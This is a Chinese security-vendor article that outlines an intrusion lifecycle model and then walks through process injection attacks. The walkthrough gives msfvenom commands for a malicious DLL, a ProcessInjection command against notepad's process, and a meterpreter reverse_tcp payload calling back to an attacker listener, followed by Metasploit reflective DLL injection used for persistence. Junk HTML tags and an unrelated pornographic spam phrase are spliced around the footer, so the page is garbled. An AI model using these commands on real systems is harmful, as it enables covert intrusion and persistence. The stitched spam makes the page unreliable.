<optgroup id="ecxsa"></optgroup>

<output id="ecxsa"><nav id="ecxsa"><video id="ecxsa"></video></nav></output>

      1. <p id="ecxsa"></p>

        <code id="ecxsa"></code>
        安全研究 >> 安全研究詳情

        《入侵生命周期細分實踐指南系列》:進程注入攻擊

        作者: 美創科技安全實驗室發布日期: 04月02日

        美創科技為了更好地進行入侵檢測和防御,參照各種安全威脅框架和自身的實踐與思考,提出了基于入侵生命周期的攻擊管理模型,作為美創新一代安全架構的三大支柱之一。


        入侵生命周期v1.0把入侵過程劃分為7個階段:探索發現、入侵和感染、探索感知、傳播、持久化、攻擊和利用、恢復。入侵生命周期v1.0同樣以ATT&CK作為基本戰術知識庫,匹配到不同的入侵階段。需要注意的是,并非所有的入侵都會經歷這7個階段,也沒有絕對的線性次序。


        1) 探索發現

        在這個階段中,攻擊者會先鎖定攻擊對象,然后利用某些技術手段,盡可能多地獲取目標暴露出來的信息,如通過端口掃描、指紋探測等方式,發現敏感端口及版本信息,進而尋找攻擊點,為下一步入侵做準備。


        2)入侵和感染

        在這個階段,攻擊者會根據“探索發現”階段所發現的重要信息,來對目標暴露出的攻擊面進行攻擊嘗試,在“探索發現”階段收集到的信息越多,攻擊對象所暴露的攻擊面也就越多,攻擊更易成功。


        3)探索感知

        攻擊者在成功進入系統內部后,由于是首次進入所以會出現對內部環境不熟悉的情況,這時攻擊者的動作一般會是對當前所處環境進行探索,摸清內部大致的網絡結構,常常伴隨著被入侵本機的敏感信息收集以及對內網大量的端口進行掃描,后續根據攻擊者的目的進行下一步操作。


        4)傳播

        在此階段,攻擊者根據上一階段在內網探索感知收集到的信息,選擇特定的攻擊手法。如若發現內部是域環境,攻擊者可能會嘗試先攻破域控服務器,再傳播其他機器。若是工作組環境,可能會利用收集到的端口和服務信息,選擇特定漏洞進行批量掃描攻擊,來盡可能多地繼續獲得其他計算機的控制權。


        5)持久化

        攻擊者在對資產進行惡意操作后,為了能夠減少再次連接的攻擊成本,方便下次進入,會進行“留后門”的操作,常見的后門如:建立計劃任務,定時連接遠程服務器;設置開機啟動程序,在每次開機時觸發執行特定惡意程序;新建系統管理員賬號等。這樣便于攻擊者下次快速登錄并控制該系統。


        6)攻擊和利用

        攻擊者在此階段便會開始對目標資產進行惡意操作,按照攻擊者意愿,對能利用的數據進行竊取、利用;對操作系統、敏感文件進行破壞、刪除。所有的防御手段都應該極力阻止攻擊者進行到這一階段。


        7)恢復

        攻擊者在執行所有的攻擊操作時,往往會在系統上留下大量的行為日志,因此在這一階段,攻擊者會對記錄自身痕跡的所有日志進行處理,或刪除或混淆,從而消滅證據,逃避追蹤。



        本系列文章基于美創科技入侵生命周期1.0架構,細分各階段攻擊者的常用攻擊手段,并對相關攻擊手段的具體實施方式進行逐一剖析,為安全防御建設提供有力知識補充和反制準備。



        進程注入攻擊

        傳播


        進程注入是一種在某個單獨的實時進程的地址空間中執行任意代碼的方法。 在一個進程的上下文中運行特定代碼,則有可能訪問該進程的內存,系統或網絡資源以及提升權限。

        從攻擊者的角度來分析,利用進程注入技術,可以將惡意代碼注入到合法進程之中,從而逃避基于信任進程的防御手段。

        根據攻擊者的入侵流程和操作手段,利用進程注入進行攻擊在入侵過程的攻擊執行階段,可以幫助攻擊者在入侵成功后執行惡意操作,從入侵生命周期角度分析,進程注入攻擊可作用于傳播階段、攻擊和利用階段、持久化階段。在傳播階段,攻擊者通過向合法進程中注入惡意程序,躲避檢測進行橫向攻擊和傳播。

        從攻擊行為鏈條的上下文來看,針對進程注入攻擊的行為鏈條輸入輸出如下:


        輸入:注入的惡意代碼、需要注入的進程

        輸出:進程注入后所執行的惡意操作


        根據不同攻擊思路,攻擊者利用進程注入進行攻擊的手法通常有11種:


        1. Portable ExecutableInjection--PE注入

        2. ThreadExecution Hijacking--線程執行流劫持

        3. AsynchronousProcedure Call--異步過程調用

        4. ThreadLocal Storage--線程本地存儲

        5. PtraceSystem Calls--Ptrace系統調用

        6. ProcMemory--處理內存

        7. ExtraWindow Memory Injection--EWM式注入

        8. ProcessHollowing--進程替換

        9. ProcessDoppelg?nging--新型代碼注入技術

        10. VDSOHijacking--VDSO劫持

        11. Dynamic-linkLibrary Injection--動態鏈接庫注入


        上述11種攻擊手法中最常用的是動態鏈接庫注入,也就是dll注入,dll注入中常用的技術有常規dll文件注入和反射式dll注入。


        1)使用ProcessInjection進行常規dll注入

        DLL注入是將代碼注入到一個遠程進程中,并讓遠程進程調用LoadLibrary()函數,從而強制遠程進程加載一個DLL程序到進程中。

        使用msfvenom生成一個用于進程注入的惡意dll

        msfvenom -p windows/x64/messagebox text="Injection Success!" -fdll > shellcode.dll


        將生成的shellcode.dll復制到受害者機器上

        下載進程注入工具,并使用vs2019編譯生成可執行文件

        https://github.com/3xpl01tc0d3r/ProcessInjection

        使用記事本打開任意一個文件,開啟記事本程序的進程,并用tasklist命令查看notpad.exe的進程pid

        使用命令ProcessInjection.exe/pid:3308 /path:"C:\Users\win7\Desktop\shellcode.dll" /t:2進行dll注入


        2)使用Metasploit進行反射式dll注入在實戰中經常利用進程注入進行后門的持久化,比如當攻擊者通過metasploit或者cs連接到主機后,會將會話注入到正常的進程中,在這個過程中dll不會在目標機器上落地,可以大大降低dll被發現的風險首先生成使用msf獲得一個meterpreter會話msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe >test.exe

        usepost/windows/manage/reflective_dll_inject

        注入成功

        服務熱線:400-811-3777
        Copyright ?2005-2020 杭州美創科技有限公司. All Rights Reserved. 浙公網安備 33010502006954號 浙ICP備12021012號-1 網站地圖
        亚洲高潮喷水无码
        <optgroup id="ecxsa"></optgroup>

        <output id="ecxsa"><nav id="ecxsa"><video id="ecxsa"></video></nav></output>

            1. <p id="ecxsa"></p>

              <code id="ecxsa"></code>